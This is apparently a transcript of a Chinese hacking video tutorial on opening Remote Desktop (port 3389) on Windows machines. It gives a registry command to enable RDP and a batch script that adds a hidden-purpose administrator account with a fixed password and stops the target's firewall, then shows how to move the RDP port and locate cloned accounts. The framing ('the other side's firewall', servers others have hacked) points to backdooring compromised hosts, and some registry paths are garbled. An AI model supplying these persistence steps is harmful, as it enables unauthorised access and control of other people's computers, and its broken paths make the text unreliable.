|
一:使用工具开启主机3389
二:使用cmd修改注册表开启主机3389
三:制作bat来开启3389
四:修改3389端口
五:删除使用克隆帐户的用户名
好了下面开始吧。
一:我们用到的工具在我桌面上3389.exe 我们给他放到 任何盘
我放到D盘吧。我们执行cmd 输入3389.exe 哦,对了,大家还是先看看
我本机有没开启3389吧
= = 开了,我先给他关掉 好了,我们执行cmd 再来看一下
开启了吧。
二:我们使用cmd 修改注册表来达到开启3389的目的 执行以下命令
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
我们来看一下开了吧。
三:我们自己来写一个批处理来达到开3389的目的
@echo off
title 3389 标题
color 0a 背景字体颜色
3389.exe 执行3389
net user kaikai 123456 /add 添加帐户
net localgrou administrators kaikai /add 把帐户提升为管理员
这样我们就完成了,开启3389 再给自己提权的过程 还有一个是要关闭对方防火墙 我防火墙命令忘记了,看看记事本 = =
net stop sharedaccess 这是关闭防火墙的命令,我们给他写一下
这样我们的批处理就做好了。
条件是要跟3389.exe放在同一个目录下面
四:修改3389端口通过以下注册表位置
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds
dpwdTds cp 修改下面的portnumber 键值 (十进制) 改为你需要的端口 比如 3344
还有一个位置也要改一下
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp
下面的portnumber 改成你上面改的端口(3344)
重启计算机就可以了。
五:关于克隆账号其实并不怎么隐藏了,只是现在用的人还是有的。
当你拿到一台别人黑过的服务器 然而他做了克隆帐户以后怎么办。
是不是就不去删他用户了呢?当然不是的。
在我的电脑管理那 用户看不到 可以看注册表
HKEY_LOCAL_MACHINESAMSAM 这个位置下面 因为我的权限不够
所以不能展开 需要权限也是很简单的 右键 权限管理 添加你的帐户就可以了
一般 帐户除了你自己的帐户 后面加= = 那个符号这里打不出来 我打记事本上
隐者黑鹰
|
